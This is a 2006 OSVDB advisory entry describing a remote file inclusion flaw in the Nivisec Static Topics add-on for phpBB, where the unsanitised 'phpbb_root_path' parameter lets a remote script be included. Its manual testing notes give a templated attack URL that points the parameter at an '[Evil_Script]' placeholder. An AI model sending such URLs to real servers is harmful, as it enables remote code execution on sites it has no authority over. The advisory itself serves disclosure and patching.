Nivisec Static Topics for phpBB includes/functions_static_topics.php phpbb_root_path Variable Remote File Inclusion

2006-10-04T09:34:28
ID OSVDB:29506
Type osvdb
Reporter Kw3rLn(kw3rln@hotmail.com)
Modified 2006-10-04T09:34:28

Description

Vulnerability Description

Nivisec Static Topics for phpBB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/functions_static_topics.php script not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Nivisec has released a patch to address this vulnerability.

Short Description

Nivisec Static Topics for phpBB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/functions_static_topics.php script not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/includes/functions_static_topics.php?phpbb_root_path=[Evil_Script]

References:

Vendor URL: http://www.nivisec.com/ Secunia Advisory ID:22269 ISS X-Force ID: 29347 Generic Exploit URL: http://www.milw0rm.com/exploits/2477 FrSIRT Advisory: ADV-2006-3916 CVE-2006-5191 Bugtraq ID: 20353